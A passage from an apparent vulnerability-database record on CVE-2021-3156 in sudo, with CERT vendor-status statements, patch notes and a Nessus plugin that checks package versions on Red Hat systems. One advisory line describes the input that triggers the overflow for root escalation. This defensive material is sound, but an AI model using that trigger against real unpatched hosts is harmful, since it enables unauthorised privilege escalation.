2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://ubuntu.com/security/CVE-2021-3156>\n\n### Wind River __ Affected\n\nNotified: 2021-02-04 Updated: 2021-02-08\n\n**Statement Date: February 08, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\n\"Heap-based buffer overflow in sudo\" affects the Wind River Linux product.\n\n### Android Open Source Project __ Not Affected\n\nNotified: 2021-02-04 Updated: 
2021-02-08\n\n**Statement Date: February 05, 2021**\n\n**CVE-2021-3156**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAndroid is not impacted as it does not have SUDO.\n\n### eCosCentric Not Affected\n\nNotified: 2021-02-04 Updated: 2021-02-05\n\n**Statement Date: February 05, 2021**\n\n**CVE-2021-3156**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### FreeBSD Project __ Not Affected\n\nNotified: 2021-02-04 Updated: 2021-02-08\n\n**Statement Date: February 08, 2021**\n\n**CVE-2021-3156**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWhile the base FreeBSD installation does not include sudo and is therefore not directly affected by this vulnerability, the FreeBSD Project recognises that sudo is a very popular package for users to install on FreeBSD.\n\nUsers can install sudo on FreeBSD using ports or binary packages. The sudo port was updated to 1.9.5p2 on 2021-01-26 at 20:15:31 (main) and on 2021-01-26 20:40:57 (2021Q1 quarterly). Binary packages are available for all tier-1 supported platforms (amd64, i386, aarch64) and several tier-2 supported platforms.\n\n### Green Hills Software Not Affected\n\nNotified: 2021-02-04 Updated: 2021-02-05\n\n**Statement Date: February 04, 2021**\n\n**CVE-2021-3156**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Illumos __ Not Affected\n\nNotified: 2021-02-04 Updated: 2021-02-10\n\n**Statement Date: February 10, 2021**\n\n**CVE-2021-3156**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nillumos itself does not have sudo in its source. 
Illumos distros, however, do.\n\nA NOTE: base illumos has the RBAC/profile-based pfexec(1) family of commands that are an alternative for sudo.\n\nSmartOS: Use `pkgin upgrade` on any zones that have sudo installed.\n\nOmniOSce and OpenIndiana (both use the IPS package system): Use `pkg update` to obtain the latest sudo if it's installed.\n\nDilos: Is fixed in update https://bitbucket.org/dilos/du2/commits/ca5129c54c84d7b2fd75d17e465e970435018f55 - a Debian-style update will install it.\n\nTribblix: If sudo is installed, `zap refresh && zap update sudo`\n\n### Microsoft Not Affected\n\nNotified: 2021-02-04 Updated: 2021-02-15\n\n**Statement Date: February 12, 2021**\n\n**CVE-2021-3156**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Zephyr Project __ Not Affected\n\nNotified: 2021-02-04 Updated: 2021-02-05\n\n**Statement Date: February 05, 2021**\n\n**CVE-2021-3156**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nThe Zephyr project is an embedded RTOS, and as such, does not directly have the capability to run sudo. However, there are few instances of sudo in the project scripts and documentation.\n\n * Numerous instances throughout the documentation of suggestions to run a command with sudo. Generally, these are platform package management commands, in order to install dependencies needed to build Zephyr. It is assumed that the developer already has privileges necessary to run these commands, and this exploit would not gain additional privileges.\n * sudo is used in CI to install dependencies needed to run the tests. These operations are run in a containered environment, and sudo is configured to run without requesting a password. 
Again privileges are required to run the tests, and no additional privileges are gained through this exploit.\n\n### ADATA Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AirWatch Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alpine Linux Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Altran Intelligent Systems Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Amazon Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Apple Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arch Linux Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arista Networks Inc. 
Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### BlackBerry Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Blackberry QNX Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Blunk Microsystems Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### CMX Systems Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Contiki OS Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cricket Wireless Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell EMC Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell SecureWorks Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### DesktopBSD Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor 
Statement\n\nWe have not received a statement from the vendor.\n\n### DragonFly BSD Project Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ENEA Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Express Logic Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### FNet Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### FreeRTOS Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Google Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hewlett Packard Enterprise Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### HP Inc. 
Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### HTC Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-05\n\n**Statement Date: February 05, 2021**\n\n**CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Numa-Q Division (Formerly Sequent) Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Lenovo Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### LG Electronics Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### LITE-ON Technology Corporation Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Lynx Software Technologies 
Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### m0n0wall Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Marconi Inc. Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Micro Focus Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NEC Corporation Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetBSD Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nexenta Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenBSD Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenIndiana Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not 
received a statement from the vendor.\n\n### Phoenix Contact Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Roku Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Samsung Mobile Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Schneider Electric Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Slackware Linux Inc. 
Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SonicWall Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sony Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### The OpenBSD project Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Tizen Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-24 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Treck Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TrueOS Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Turbolinux Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Unisys Corporation Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Univention Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Xiaomi Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not 
received a statement from the vendor.\n\n### XigmaNAS Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Xilinx Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 87 vendors __View less vendors __\n\n \n\n\n### References \n\n * <https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit>\n * <https://www.zdnet.com/article/recent-root-giving-sudo-bug-also-impacts-macos/>\n * <https://twitter.com/hackerfantastic/status/1356645638151303169>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-3156 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-3156>) \n---|--- \n**Date Public:** | 2021-02-04 \n**Date First Published:** | 2021-02-04 \n**Date Last Updated: ** | 2021-02-24 13:59 UTC \n**Document Revision: ** | 11 \n", "modified": "2021-02-24T13:59:00", "published": "2021-02-04T00:00:00", "id": "VU:794544", "href": "https://www.kb.cert.org/vuls/id/794544", "type": "cert", "title": "Heap-Based Buffer Overflow in Sudo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-06T14:12:52", "description": "The remote Redhat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in\nthe RHSA-2021:0220 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-27T00:00:00", "title": "RHEL 8 : sudo (RHSA-2021:0220)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": 
"2021-01-27T00:00:00", "cpe": ["cpe:/o:redhat:rhel_eus:8.1", "cpe:/o:redhat:rhel_e4s:8.1::baseos", "cpe:/o:redhat:rhel_e4s:8.1", "p-cpe:/a:redhat:enterprise_linux:sudo", "cpe:/o:redhat:rhel_eus:8.1::baseos"], "id": "REDHAT-RHSA-2021-0220.NASL", "href": "https://www.tenable.com/plugins/nessus/145494", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0220. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145494);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2021-3156\");\n script_xref(name:\"RHSA\", value:\"2021:0220\");\n script_xref(name:\"IAVA\", value:\"2021-A-0053\");\n\n script_name(english:\"RHEL 8 : sudo (RHSA-2021:0220)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in\nthe RHSA-2021:0220 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0220\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1917684\");\n script_set_attribute(attribute:\"solution\", 
value:\n\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(122);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.1::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.1::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '8.1')) audit(AUDIT_OS_NOT, 'Red Hat 8.1', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'rhel_e4s_8_1_baseos': [\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms__8_DOT_1'\n ],\n 'rhel_eus_8_1_baseos': [\n 'rhel-8-for-aarch64-baseos-eus-debug-rpms',\n 'rhel-8-for-aarch64-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-baseos-eus-rpms',\n 'rhel-8-for-aarch64-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-baseos-eus-source-rpms',\n 'rhel-8-for-aarch64-baseos-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-s390x-baseos-eus-debug-rpms',\n 'rhel-8-for-s390x-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-s390x-baseos-eus-rpms',\n 
'rhel-8-for-s390x-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-s390x-baseos-eus-source-rpms',\n 'rhel-8-for-s390x-baseos-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-eus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-eus-rpms',\n 'rhel-8-for-x86_64-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-eus-source-rpms',\n 'rhel-8-for-x86_64-baseos-eus-source-rpms__8_DOT_1'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0220');\n}\n\npkgs = [\n {'reference':'sudo-1.8.25p1-8.el8_1.2', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'reference':'sudo-1.8.25p1-8.el8_1.2', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'reference':'sudo-1.8.25p1-8.el8_1.2', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 
'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sudo');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T13:24:54", "description": "The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2021-0221 advisory.\n\n - Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via sudoedit\n -s and a command-line argument that ends with a single backslash character: (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported 
version\nnumber.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-27T00:00:00", "title": "Oracle Linux 7 : sudo (ELSA-2021-0221)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-27T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:sudo", "p-cpe:/a:oracle:linux:sudo-devel", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2021-0221.NASL", "href": "https://www.tenable.com/plugins/nessus/145461", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2021-0221.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145461);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2021-3156\");\n script_xref(name:\"IAVA\", value:\"2021-A-0053\");\n\n script_name(english:\"Oracle Linux 7 : sudo (ELSA-2021-0221)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in 